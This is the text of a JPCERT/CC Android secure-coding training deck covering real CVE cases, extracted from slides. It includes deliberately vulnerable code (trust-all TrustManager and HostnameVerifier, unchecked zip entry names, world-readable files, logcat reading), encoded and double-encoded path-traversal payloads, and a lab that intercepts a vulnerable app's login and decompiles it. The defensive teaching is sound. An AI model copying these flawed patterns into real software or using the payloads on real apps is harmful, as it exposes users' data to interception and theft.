Information Management Vulnerability
107
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenarios
108
Attacker
Account information
1. Monaca debugger app outputs the account information to log
2. Malicious app can obtain the account information from the log
Information Disclosure
User Malicious app
log output
Monaca Debugger app
Copyright©2014 JPCERT/CC All rights reserved.
• Used logging for debugging purpose?
• Released without deleting the debug code ?
• Any app with READ_LOGS permission could obtain all the other app's log output
Causes of the Vulnerability
109
Causes
Copyright©2014 JPCERT/CC All rights reserved.
Solutions of the Vulnerability
110
Solutions
• App should make sure that it does not send sensitive information to log output
• Declare and use custom log class • so that log output is automatically turned on/off based on
Debug/Release • use ProGuard to delete specific method call
Copyright©2014 JPCERT/CC All rights reserved.
Android 4.0(API15) or before
Any application with READ_LOGS permission could obtain all the other app's log output
111
App A App B
obtain log output
Log.v("method", Login.TAG + ", account=" + str1);
Process mProc = Runtime.getRuntime(). exec( new String[]{"logcat", "-d", "method:V *:S”});
READ_LOGS permission
Copyright©2014 JPCERT/CC All rights reserved.
Android 4.1(API16) or later
The behavior of READ_LOGS permission was changed —Even app with READ_LOGS permission cannot obtain log
output from other apps
By connecting device to PC, log output from other app can still be obtained
112
App A App B
obtain log output READ_LOGS permission
Copyright©2014 JPCERT/CC All rights reserved.
Refer to JSSEC Secure Coding Guidebook
113
Sensitive information must not be output by android.util.Log
Copyright©2014 JPCERT/CC All rights reserved.
Storing Sensitive Data in External Storage (SD cards)
CASE #10
114
Copyright©2014 JPCERT/CC All rights reserved.
CVE-2012-4007
Malicious app could access friends’ comments
115
https://play.google.com/store/apps/details?id=jp.mixi https://jvn.jp/en/jp/JVN92038939/
SNS app for posting comments, checking friends’ updates, etc.
Copyright©2014 JPCERT/CC All rights reserved.
1. SNS app fetches a comment of user’s friend (supposedly sensitive)
2. SNS app saves it to SD card 3. Other app retrieves the comment from SD card 4. And send it to an attacker
information leak
attacker
friends’ comments
116
Other app (malware)
SD card
Attack Scenario
Copyright©2014 JPCERT/CC All rights reserved.
malware
• Friends’ comments are saved to SD card
• The contents in SD card can be read by other apps
SD card
Files in SDcard can be read from other apps
file friends’ comments
friends’ comments
friends’ comments
117
Root Cause
Copyright©2014 JPCERT/CC All rights reserved.
App Directory
malware
SD card
friends’ comments
friends’ comments
File with MODE_PRIVA
TE
NOT Readable
Solution
118
Save friends’ comments to a file at the internal storage (application-specific directory)
Copyright©2014 JPCERT/CC All rights reserved.
4.6.1.1. Using Private Files
119
Refer to the JSSEC Secure Coding Guidebook
•Files should not be shared with other apps •Files should be created with MODE_PRIVATE
Copyright©2014 JPCERT/CC All rights reserved.
Improper File Permissions
CASE #11
120
Copyright©2014 JPCERT/CC All rights reserved.
CVE-2013-2301 OpenWnn Info. Disclosure
Malicious App could access files stored in vulnerable app’s application data directory
121
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenario
122
Attack Scenario User installs and executes a malicious app
User
User
install Mal app App Market,
attacker’s site, etc.
The malicious app steals OpenWnn’s application data
access
Mal app
http://jvndb.jvn.jp/en/contents/2013/JVNDB-2013-000025.html
Application data is not supposed to be shared among apps but improper file permission make it possible
OpenWnn’s sensitive data is stolen
Copyright©2014 JPCERT/CC All rights reserved.
Root Cause
123
Attack Scenario User installs and executes malicious app
User
User
install Mal app App Market,
attacker’s site, etc.
The malicious app accesses the file in the internal storage
access
Mal app
Internal storage area is expected to protect private files, but files can be accessible if access permissions are improperly set.
The access permission of the created file was set to WORLD_READABLE. Other app could read the file if the file path is known.
Copyright©2014 JPCERT/CC All rights reserved.
Solution
124
Attack Scenario User installs and executes malicious app
User
User
install Mal app App Market,
attacker’s site, etc.
The malicious app accesses the file in the internal storage
access
Mal app
Internal storage area is expected to protect private files, but files can be accessible if access permissions are improperly set.
Application data (private files) should be created with the access permission MODE_PRIVATE
Copyright©2014 JPCERT/CC All rights reserved.
Security Models are different in Android and Linux
Application can read any other application’s data (user’s file).
Application resources should be isolated unless the resource needs to be shared among different apps.
125
What do you mean by “user”? On Android each app has different UID so application data should be protected.
125
Copyright©2014 JPCERT/CC All rights reserved.
Saving application data in Android OS
Android provides several options for you to save persistent application data —Shared Preferences —Internal Storage —External Storage —SQLite Databases —Network Connection
126
http://developer.android.com/guide/topics/data/data-storage.html
126
Copyright©2014 JPCERT/CC All rights reserved.
Take care where to save files… —Shared Preferences —Internal Storage —External Storage —SQLite Databases —Network Connection
Saving application data in Android OS
127
Those options use “private” local files. Those options use “private” local files. Those options use “private” local files.
127
Copyright©2014 JPCERT/CC All rights reserved.
Access Permissions of Android OS
MODE_PRIVATE MODE_WORLD_READABLE MODE_WORLD_WRITABLE
Context class of android.content package defines the file access permissions…
128
Copyright©2014 JPCERT/CC All rights reserved.
Access Permissions of Android OS
MODE_PRIVATE MODE_WORLD_READABLE MODE_WORLD_WRITABLE
129
String FILENAME = “hello_file”; String string = “ciao world!”; FileOutputStream fos = openFileOutput(FILENAME, Context.MODE_PRIVATE); fos.write(string.getBytes()); fos.close();
the created file can only be accessed by the calling application (or all applications sharing the same user ID).
Copyright©2014 JPCERT/CC All rights reserved.
Access Permissions of Android OS
MODE_PRIVATE MODE_WORLD_READABLE MODE_WORLD_WRITABLE
130
allow all other applications to have read access to the created file.
“This constant was deprecated in API level 17. Creating world-readable files is very dangerous, and likely to cause security holes in applications. It is strongly discouraged; instead, applications should use more formal mechanism for interactions such as ContentProvider, BroadcastReceiver, and Service. …”
Copyright©2014 JPCERT/CC All rights reserved.
Access Permissions of Android OS
MODE_PRIVATE MODE_WORLD_READABLE MODE_WORLD_WRITABLE
131
allow all other applications to have write access to the created file.
“This constant was deprecated in API level 17. Creating world-writable files is very dangerous, and likely to cause security holes in applications. It is strongly discouraged; instead, applications should use more formal mechanism for interactions such as ContentProvider, BroadcastReceiver, and Service. …”
Copyright©2014 JPCERT/CC All rights reserved.
Application sandboxing in Android OS
Android OS gives each application a distinct Linux user ID Android OS takes advantage of Linux user-based protection to identify and isolate application resources If you need to share data between applications, use inter-process communication mechanism, e.g., ContentProvider, BroadcastReceiver, Service, …
132
http://source.android.com/devices/tech/security/index.html
Application-specific files should be isolated from other apps. That is Android’s basic principle!
Copyright©2014 JPCERT/CC All rights reserved.
Summary
Remember the design principle of Android OS —Don’t allow other applications to access your local
files Use IPC mechanism (such as ContentProvider) for sharing data among apps When you need to share data with other app, consider the risk of malware and protect against them.
File permission of local files should be MODE_PRIVATE
133
Copyright©2014 JPCERT/CC All rights reserved.
4.6.1.1. Using Private Files
134
Refer to the JSSEC Secure Coding Guidebook
•Files should not be shared with other apps •Files should be created with MODE_PRIVATE
Copyright©2014 JPCERT/CC All rights reserved.
Geolocation API and Privacy Concern
CASE #12
135
Copyright©2014 JPCERT/CC All rights reserved.
Geolocation API
Enables web browsers to access geographical location information of user's device —http://www.w3.org/TR/geolocation-API/ —Specified by W3C
To use Geolocation API under WebView —Permission
android.permission.ACCESS_FINE_LOCATION android.permission.ACCESS_COARSE_LOCATION android.permission.INTERNET
—WebView class WebSettings#setGeolocationEnabled(true);
136
Copyright©2014 JPCERT/CC All rights reserved.
To Retrieve User’s Location Data on A Web Page
An example javascript of using Geolocation API:
137
<script> navigator.geolocation.getCurrentPosition( function(position) { alert(position.coords.latitude); alert(position.coords.longitude); }, function(){ // error }); </script>
Copyright©2014 JPCERT/CC All rights reserved.
Ask for user's consent
138
Should not send geolocation information to websites without obtaining the user's consent
Copyright©2014 JPCERT/CC All rights reserved.
There are a lot of Vulnerable Code Out There
139
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerable Implementation
140
public void onGeolocationPermissionsShowPrompt(String arg3, GeolocationPermissions$Callback arg4) { super.onGeolocationPermissionsShowPrompt(arg3, arg4); arg4.invoke(arg3, true, false); }
whether or not the origin should be allowed to use the Geolocation API
the origin for which permissions are set
whether the permission should be retained beyond the lifetime of a page currently being displayed by a WebView
Send without asking user's permission
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenarios
Only need to induce the user to visit a website
Then, an attacker can get the user's geolocation information
141
Copyright©2014 JPCERT/CC All rights reserved.
Summary
142
Only send geolocation information to a website after obtaining the user's consent
Copyright©2014 JPCERT/CC All rights reserved.
Android Cipher List Issue
CASE #13
143
Copyright©2014 JPCERT/CC All rights reserved.
Best Practice for Using Cryptography
http://developer.android.com/guide/practices/security.html#Crypto
“In general, try using the highest level of pre-existing framework implementation that can support your use case. ………
144
If you cannot avoid implementing your own protocol, we strongly recommend that you do not implement your own cryptographic algorithms.”
Copyright©2014 JPCERT/CC All rights reserved.
Clear understanding on the algorithm Fine coding skill to implement the algorithm correctly Sophisticated testing skill to verify the code is correct
When you need to implement your own protocol, you will need
145
Best Practice for Using Cryptography
As a casual application developer, you should rely on a popular (well-tested) frameworks/libraries.
Copyright©2014 JPCERT/CC All rights reserved. 146
However……
Copyright©2014 JPCERT/CC All rights reserved.
Android Cipher List Issue
147
http://op-co.de/blog/posts/android_ssl_downgrade/
Copyright©2014 JPCERT/CC All rights reserved. 148
RSA/MD5 is on the top!
Android Cipher List Issue
Copyright©2014 JPCERT/CC All rights reserved.
… from Source code of Android 4.1_r2
149
/** * Provides the Java side of our JNI glue for OpenSSL. */ public final class NativeCrypto { ………… static { // Note these are added in priority order add(“SSL_RSA_WITH_RC4_128_MD5”, “RC4-MD5”); add(“SSL_RSA_WITH_RC4_128_SHA”, “RC4-SHA”); add(“TLS_RSA_WITH_AES_128_CBC_SHA”, “AES128-SHA”); add(“TLS_RSA_WITH_AES_256_CBC_SHA”, “AES256-SHA”); add(“TLS_ECDH_ECDSA_WITH_RC4_128_SHA”, “ECDH-ECDSA-RC4-SHA”); ............
https://android.googlesource.com/platform/libcore/+/android-cts-4.1_r2/luni/src/main/java/org/apache/harmony/xnet/provider/jsse/NativeCrypto.java
Cipher list is hard-coded
Copyright©2014 JPCERT/CC All rights reserved.
RC4-MD5 should be avoided
150
Disable RC4 The RC4 cipher suite is considered insecure and should be disabled. At the moment, the best attacks we know require millions of requests, a lot of bandwidth and time. Thus, the risk is still relatively low, but we expect that the attacks will improve in the future.
From Qualys SSL Labs, “SSL/TLS Deployment Best Practices”
https://www.ssllabs.com/projects/best-practices/
Copyright©2014 JPCERT/CC All rights reserved.
Solution
151
Next Page…
Copyright©2014 JPCERT/CC All rights reserved.
Solution
152
Customize the cipher list using setEnabledCipherSuites()
Copyright©2014 JPCERT/CC All rights reserved.
Solution
153
Customize the cipher list using setProperty(“https.cipherSuites”,…)
http://blog.livedoor.jp/k_urushima/archives/cat_38371.html
Copyright©2014 JPCERT/CC All rights reserved.
Path Traversal
CASE #14
154
Copyright©2014 JPCERT/CC All rights reserved.
CVE-2013-0704: GREE Path Traversal Vulnerability
GREE https://play.google.com/store/apps/details?id=jp.gree.android.app
Feature —Mobile social gaming app
Vulnerability —Other app could obtain the private file of the app
155
Copyright©2014 JPCERT/CC All rights reserved.
Overview of Vulnerability
The implementation of ContentProvider contained a flaw —used openFile method for sharing image file
ContentProvider#openFile —Provides a facility for other app to access your app data.
156
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerable Code
In openFile method —Obtain the last segment of a path using the
Uri#getLastPathSegment —Return the target file from the specified directory
157
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath(); public ParcelFileDescriptor openFile(Uri paramUri, String paramString) throws FileNotFoundException { File file = new File(IMAGE_DIRECTORY, paramUri.getLastPathSegment()); return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY); }
jp/gree/android/sdk/ImageProvider
Copyright©2014 JPCERT/CC All rights reserved.
Uri#getLastPathSegment
Uri#getLastPathSegment internally calls Uri#getPathSegments
158
public String getLastPathSegment() { // TODO: If we haven't parsed all of the segments already, just // grab the last one directly so we only allocate one string. List<String> segments = getPathSegments(); int size = segments.size(); if (size == 0) { return null; } return segments.get(size - 1); }
Copyright©2014 JPCERT/CC All rights reserved.
Excerpt from Uri#getPathSegments
159
PathSegmentsBuilder segmentBuilder = new PathSegmentsBuilder(); int previous = 0; int current; while ((current = path.indexOf('/', previous)) > -1) { // This check keeps us from adding a segment if the path starts // '/' and an empty segment for "//". if (previous < current) { String decodedSegment = decode(path.substring(previous, current)); segmentBuilder.add(decodedSegment); } previous = current + 1; } // Add in the final path segment. if (previous < path.length()) { segmentBuilder.add(decode(path.substring(previous))); } return pathSegments = segmentBuilder.build(); }
Copyright©2014 JPCERT/CC All rights reserved.
Uri#getPathSegments
160
PathSegmentsBuilder segmentBuilder = new PathSegmentsBuilder(); int previous = 0; int current; while ((current = path.indexOf('/', previous)) > -1) { // This check keeps us from adding a segment if the path starts // '/' and an empty segment for "//". if (previous < current) { String decodedSegment = decode(path.substring(previous, current)); segmentBuilder.add(decodedSegment); } previous = current + 1; } // Add in the final path segment. if (previous < path.length()) { segmentBuilder.add(decode(path.substring(previous))); } return pathSegments = segmentBuilder.build(); }
divide the path into segments using "/" as a separator
and then decoded
../../%E3%81%BB%E3%81%92%2Ejpg
Path is separated by "/"
..
hoge.jpg
..
Copyright©2014 JPCERT/CC All rights reserved.
Uri#getPathSegments PathSegmentsBuilder segmentBuilder = new PathSegmentsBuilder(); int previous = 0; int current; while ((current = path.indexOf('/', previous)) > -1) { // This check keeps us from adding a segment if the path starts // '/' and an empty segment for "//". if (previous < current) { String decodedSegment = decode(path.substring(previous, current)); segmentBuilder.add(decodedSegment); } previous = current + 1; } // Add in the final path segment. if (previous < path.length()) { segmentBuilder.add(decode(path.substring(previous))); } return pathSegments = segmentBuilder.build(); }
161
../../..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg
../../hoge.jpg
What happens if “/” in the path is URL encoded to "%2F“ ?
"/" are separated, but "%2F" are not.
Therefore after the path separation, the last path segment containing
"%2F" is decoded to “/” which allows path traversal.
..
..
Copyright©2014 JPCERT/CC All rights reserved.
Fix Applied by the Developer
Uri#getLastPathSegment is called twice
162
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath(); public ParcelFileDescriptor openFile(Uri paramUri, String paramString) throws FileNotFoundException { File file = new File(IMAGE_DIRECTORY, Uri.parse(paramUri.getLastPathSegment()).getLastPathSegment()); return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY); }
Copyright©2014 JPCERT/CC All rights reserved.
Fix Applied by the Developer
Uri#getLastPathSegment is called twice
163
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath(); public ParcelFileDescriptor openFile(Uri paramUri, String paramString) throws FileNotFoundException { File file = new File(IMAGE_DIRECTORY, Uri.parse(paramUri.getLastPathSegment()).getLastPathSegment()); return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY); }
The first getLastPathSegment
../../..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg
../../hoge.jpg
The second getLastPathSegment
hoge.jpg
../../hoge.jpg
Copyright©2014 JPCERT/CC All rights reserved. 164
Is This Fix Enough?
Copyright©2014 JPCERT/CC All rights reserved.
Double Encoding
Encode the encoded text.
165
https://www.owasp.org/index.php/Double_Encoding
..%2F..%2F%E3%81%BB%E3%81%92%2Ejpg
%252E%252E%252F%252E%252E%252F%25E3%2581%25BB%25E3%2581%2592%252Ejpg
Copyright©2014 JPCERT/CC All rights reserved.
What if path is double-encoded? How does the previous fix decode a double-encoded path?
166
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath(); public ParcelFileDescriptor openFile(Uri paramUri, String paramString) throws FileNotFoundException { File file = new File(IMAGE_DIRECTORY, Uri.parse(paramUri.getLastPathSegment()).getLastPathSegment()); return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY); }
The first getLastPathSegment
%2E%2E%2F%2E%2E%2F%E3%81%BB%E3%81%92%2Ejpg
The second getLastPathSegment
../../hoge.jpg
%252E%252E%252F%252E%252E%252F%25E3%2581%25BB%25E3%2581%2592%252Ejpg
%2E%2E%2F%2E%2E%2F%E3%81%BB%E3%81%92%2Ejpg
decode "%25" to "%"
Again, path traversal is possible
Copyright©2014 JPCERT/CC All rights reserved.
Solution First canonicalize the path using File#getCanonicalPath. Then check to see if the canonicalized path is under the IMAGE_DIRECTORY.
167
private static String IMAGE_DIRECTORY = localFile.getAbsolutePath(); public ParcelFileDescriptor openFile(Uri paramUri, String paramString) throws FileNotFoundException { String decodedUriString = Uri.decode(paramUri.toString()); File file = new File(IMAGE_DIRECTORY, Uri.parse(decodedUriString).getLastPathSegment()); if (file.getCanonicalPath().indexOf(localFile.getCanonicalPath()) != 0) { throw new IllegalArgumentException(); } return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY); }
Copyright©2014 JPCERT/CC All rights reserved.
Summary
First, canonicalize the path —File#getCanonicalPath()
Then, validate the canonicalized path Reference —https://www.securecoding.cert.org/confluence/display/java/IDS
02-J.+Canonicalize+path+names+before+validating+them —https://www.owasp.org/index.php/Double_Encoding
168
Copyright©2014 JPCERT/CC All rights reserved.
Unsafe Decompression of Zip Files
CASE #15
169
Copyright©2014 JPCERT/CC All rights reserved.
ZIP File and Security
When extracting entries from a ZIP archive, be prepared to mitigate Zip Bomb and Directory Traversal attacks.
https://www.securecoding.cert.org/confluence/x/3AG-Aw
170
Copyright©2014 JPCERT/CC All rights reserved.
java.util.zip package
java.util.zip provides classes for reading from and writing to the standard ZIP and GZIP file formats. ZipInputStream -- implements an input stream filter for
reading ZIP files ZipOutputStream -- implements an output stream filter for
writing ZIP files ZipEntry -- represents a ZIP file entry GZIPInputStream -- implements an input stream filter for
reading GZIP GZIPOutputStream -- implements an output stream filter for
writing GZIP files
171
ZipInputStream
ZipOutputStream
Copyright©2014 JPCERT/CC All rights reserved.
ZipBomb
A zip bomb is a small file but when it is decompressed, its contents are more than the system can handle.
Highly compressed Consumes memory and/or disks
172
Decompresing Zip files without confirming file size could lead to DoS!!
Copyright©2014 JPCERT/CC All rights reserved.
More Bombs...
173
Decompression bomb vulnerabilities AERAsec Network Services and Security GmbH http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html
Zip Bomb (http://en.wikipedia.org/wiki/Zip_bomb)
42.zip (http://www.unforgettable.dk/)
Check and learn about decompression bombs!
Copyright©2014 JPCERT/CC All rights reserved.
Directory Traversal
Zip entries (file names) are untrusted input —Filenames in a zip file could contain special characters
(such as ‘.’, ‘/’, ‘¥’ etc) to conduct path traversal attacks
174
document.docx presentation.pptx ../../../sdcard/malware picture1.jpg picture2.jpg
Filenames in a zip file should be checked before the files are created in a filesystem.
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerable Code Example class Unzip { static final int BUFFER = 512; public static void main(String[] args) throws FileNotFoundException,IOException { BufferedOutputStream dest = null; ZipInputStream zis = new ZipInputStream(new BufferedInputStream(new FileInputStream(args[0]))); ZipEntry entry; while ((entry = zis.getNextEntry()) != null){ System.out.println(“Extracting: “ + entry); int count; byte data[] = new byte[BUFFER]; FileOutputStream fos = new FileOutputStream(entry.getName()); dest = new BufferedOutputStream(fos, BUFFER); while ((count=zis.read(data,0,BUFFER)) != -1){ dest.write(data, 0, count); } dest.flush(); dest.close(); } zis.close(); } }
175
Extracts contents without verifying the resulting size
Uses entry filenames in ZIP archive without verification
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerable Code Example class Unzip { static final int BUFFER = 512; public static void main(String[] args) throws FileNotFoundException,IOException { BufferedOutputStream dest = null; ZipInputStream zis = new ZipInputStream(new BufferedInputStream(new FileInputStream(args[0]))); ZipEntry entry; while ((entry = zis.getNextEntry()) != null){ System.out.println(“Extracting: “ + entry); int count; byte data[] = new byte[BUFFER]; FileOutputStream fos = new FileOutputStream(entry.getName()); dest = new BufferedOutputStream(fos, BUFFER); while ((count=zis.read(data,0,BUFFER)) != -1){ dest.write(data, 0, count); } dest.flush(); dest.close(); } zis.close(); } }
176
Solution: Verify filenames and resulting sizes BEFORE extracting files
Copyright©2014 JPCERT/CC All rights reserved.
static final int BUFFER = 512; static final int TOOBIG = 0x6400000; // upper limit of filesize, 100MB static final int TOOMANY = 1024; // upper limit of entries // ... private String validateFilename(String filename, String intendedDir) { File f = new File(filename); String canonicalPath = f.getCanonicalPath(); File iD = new File(intendedDir); String canonicalID = iD.getCanonicalPath(); if (canonicalPath.startsWith(canonicalID)) { return canonicalPath; } else { throw new IllegalStateException("File is outside extraction target directory."); } } public final void unzip(String filename) throws java.io.IOException{
177
Continues to the next page…
Canonicalize the given path first. Then make sure that the given path is in the intendedDir
Solution
Copyright©2014 JPCERT/CC All rights reserved.
public final void unzip(String filename) throws java.io.IOException{ FileInputStream fis = new FileInputStream(filename); ZipInputStream zis = new ZipInputStream(new BufferedInputStream(fis)); ZipEntry entry; int entries = 0; int total = 0; try { while ((entry = zis.getNextEntry()) != null) { System.out.println("Extracting: " + entry); int count; byte data[] = new byte[BUFFER]; // output a file AFTER verifying filenams and resulting file size String name = validateFilename(entry.getName(), "."); FileOutputStream fos = new FileOutputStream(name); BufferedOutputStream dest = new BufferedOutputStream(fos, BUFFER); while (total <= TOOBIG && (count = zis.read(data, 0, BUFFER)) != -1) { dest.write(data, 0, count); total += count; } dest.flush(); dest.close(); zis.closeEntry(); entries++; if (entries > TOOMANY) { throw new IllegalStateException("Too many files to unzip."); } if (total > TOOBIG) { throw new IllegalStateException("File being unzipped is too big."); } } } finally { zis.close(); } }
178
Book keeping the extracted size so that it won’t exceed some upper limit
Solution (cont.)
Copyright©2014 JPCERT/CC All rights reserved.
Improper Certificate Verification
CASE #16
179
Copyright©2014 JPCERT/CC All rights reserved.
ACM CCS 2012 Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security
http://www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf
The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software
https://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html
Many apps misuse SSL/TLS libraries!! - Do not verify certificates - Do not verify hostname part, etc.
180
Copyright©2014 JPCERT/CC All rights reserved.
25% of Apps vulnerable to HTTPS handling
181
¼ of android applications contain HTTPS related vulnerabilities
Android Application Vulnerability Research Report, Oct., 2013 http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
Copyright©2014 JPCERT/CC All rights reserved.
Root Cause of HTTPS Vulnerabilities
182
Android Application Vulnerability Research Report, Oct., 2013 http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
Customized X509TrustManager
Customized WebViewClient#onReceivedSslError
Customized HostnameVerifier
Fig.8 Causes of HTTPS-related Vulnerabilities
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerabilities published on JVN
Kindle App for Android fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN17637243/) Ameba for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN27702217/) Outlook.com for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN72950786/) JR East Japan App for Android. contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN10603428/) Denny's App for Android. contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN48810179/) Yahoo! Japan Shopping for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN75084836/) ………
183
Copyright©2014 JPCERT/CC All rights reserved.
The transaction contains users’ personal information
https://jvn.jp/en/jp/JVN39218538/index.html https://play.google.com/store/apps/details?id=jp.pizzahut.aorder
You can order pizza delivery
Pizza Order App fails to verify SSL Server Certificates
184
The vulnerability allows MITM attack!!
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenario
185
Attacker
1. App requests SSL/TLS connection
3. App proceeds the session WITHOUT verifying the certificate
user
Pizza order app
malicious certificate 2. Responds with a
malicious certificate
Impersonating The server
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerable Code
186
public static HttpClient getNewHttpClient() { DefaultHttpClient v6; try { KeyStore v5 = KeyStore.getInstance(KeyStore.getDefaultType()); v5.load(null, null); MySSLSocketFactory mySSLScoket = new MySSLSocketFactory(v5); if(PizzaHutDefineRelease.sAllowAllSSL) { ((SSLSocketFactory)mySSLScoket).setHostnameVerifier (SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); } BasicHttpParams v2 = new BasicHttpParams(); HttpConnectionParams.setConnectionTimeout(((HttpParams)v2), 30000); ... } catch(Exception v1) { v6 = new DefaultHttpClient(); } return ((HttpClient)v6); }
jp/pizzahut/aorder/data/DataUtil.java
Copyright©2014 JPCERT/CC All rights reserved.
Other Vulnerable Code Pattern
187
TrustManager tm = new X509TrustManager() { @Override public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException { // do nothing, hence accepts any certificates } @Override public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { // do nothing, hence accepts any certificates } @Override public X509Certificate[] getAcceptedIssuers() { return null; } };
HostnameVerifier hv = new HostnameVerifier() { @Override public boolean verify(String hostname, SSLSession session) { // always returns true, hence accepts any hostnames return true; } };
empty TrustManager
empty HostnameVerifier
Copyright©2014 JPCERT/CC All rights reserved.
Mitigation
Verify SSL/TLS certificates properly Additional mitigation: communicate with certain servers only —SSL Pinning —http://nelenkov.blogspot.com/2012/12/certificate-pinning-in-
android-42.html
See “Android Application Secure Design / Secure Coding guidebook”, section 5.4, Communicating via HTTPS —SSLException must be handled properly —TrustManager must not be customized —HostnameVerifier must not be customized
188
Copyright©2014 JPCERT/CC All rights reserved.
5.4.1.2 Communicating via HTTPS
189
Refer to JSSEC Secure Coding Guidebook
5.4. 2 Rule Book
Don’t customize TrustManager and HostnameVerifier
Copyright©2014 JPCERT/CC All rights reserved.
Fake ID vulnerability
190
https://bluebox.com/technical/android-fake-id-vulnerability/
Android Fake ID Vulnerability Lets Malware Impersonate Trusted Applications, Puts All Android Users Since January 2010 At Risk
Presented at BlackHat 2014 USA ANDROID FAKEID VULNERABILITY WALKTHROUGH https://www.blackhat.com/us-14/archives.html#android-fakeid-vulnerability-walkthrough
Copyright©2014 JPCERT/CC All rights reserved.
Fake ID vulnerability
191
Android apps are digitally signed Android OS verifies the signature when installing apps Signature verifier code comes from the old Apache Harmony code The signature verifier code had problem; it couldn’t verify certificate-chaining properly.
MORAL Certificate verification is a complicated process. If you need to develop your own verification code, you need a clear understanding, fine coding skill, and sophisticated testing phase.
Copyright©2014 JPCERT/CC All rights reserved.
References SSL Vulnerabilities: Who listens when Android applications talk? —http://www.fireeye.com/blog/technical/2014/08/ssl-vulnerabilities-
who-listens-when-android-applications-talk.html Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security —http://www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf
Defeating SSL Certificate Validation for Android Applications —https://secure.mcafee.com/us/resources/white-papers/wp-
defeating-ssl-cert-validation.pdf OnionKit by Android Library Project for Multi-Layer Network Connections (Better TLS/SSL and Tor) —https://github.com/guardianproject/OnionKit
Android Pinning by Moxie Marlinspike —https://github.com/moxie0/AndroidPinning
192
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Vulnerability Part 3
193
Copyright©2014 JPCERT/CC All rights reserved.
Using tools
mitmproxy or Fiddler —proxy tool
apktool —reverse engineering tool
dex2jar —convert dex to jar file
JD-GUI —decompile for Java
194
Copyright©2014 JPCERT/CC All rights reserved.
Install mitmproxy
mitmproxy —http://mitmproxy.org/
—Installation
in Windows —Install Python —https://www.python.org/
195
pip install mitmproxy
Copyright©2014 JPCERT/CC All rights reserved.
Install Fiddler
Fiddler —http://www.telerik.com/fiddler
Configure Fiddler to capture traffic from Android apps —Click [Tools] > [Fiddler Options]
Click [HTTPS] > [Decrypt HTTPS traffic] Click [Connections] > [Allow remote computers to connect]
196
Copyright©2014 JPCERT/CC All rights reserved.
apktool
apktool —https://code.google.com/p/android-apktool/ —for reverse engineering apk files
—Features
decode resources rebuild etc.
197
Copyright©2014 JPCERT/CC All rights reserved.
dex2jar
dex2jar —https://code.google.com/p/dex2jar/ —convert Android dex file to Java class file
198
Copyright©2014 JPCERT/CC All rights reserved.
JD-GUI
JD-GUI —http://jd.benow.ca/ —Decompiler for Java
199
Copyright©2014 JPCERT/CC All rights reserved.
SSL Vulnerability
200
Copyright©2014 JPCERT/CC All rights reserved.
SSL Vulnerability
Many app contains SSL vulnerability. —The FireEye Mobile Security Team analyzed the 1,000 most
downloaded free apps in Google Play. They found SSL Vulnerability in about 68% of apps.
201
http://www.fireeye.com/blog/technical/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Copyright©2014 JPCERT/CC All rights reserved.
Install vulnerable app
Vulnerable app —Monaca Debugger for Android ver1.4.1
Monaca Debugger for Android contains an issue where it fails to verify SSL server certificates.
Installation
202
adb install mobi.monaca.debugger-1.4.1.apk
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: SSL Vulnerability PC —Run the mitmproxy or Fiddler in PC
mitmproxy —Default port: 8080
Fiddler —Default port: 8888
Android —[Settings] > [Wi-Fi] > [target AP]
Tap the [Show advanced options] —Change proxy settings
[Proxy hostname], [Proxy port]
—Launch Monaca Debugger
Type "hoge@example.com" in the Email Address and "abcdefg" in the Password, Tap Login.
203
Copyright©2014 JPCERT/CC All rights reserved.
Using mitmproxy
204
Copyright©2014 JPCERT/CC All rights reserved.
Using Fiddler
205
Copyright©2014 JPCERT/CC All rights reserved.
Analysis
Decode resources
—Decode files output "out" directory.
Convert a dex file to a jar file —Launch JD-GUI —Open the jar file
mobi.monaca.debugger-1.4.1_dex2jar.jar
206
dex2jar.sh mobi.monaca.debugger-1.4.1.apk
java –jar apktool.jar d mobi.monaca.debugger-1.4.1.apk out
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Find vulnerable code
207
Find vulnerable code!
Copyright©2014 JPCERT/CC All rights reserved.
Spot the Flaw
208
Copyright©2014 JPCERT/CC All rights reserved.
Logging Vulnerability
209
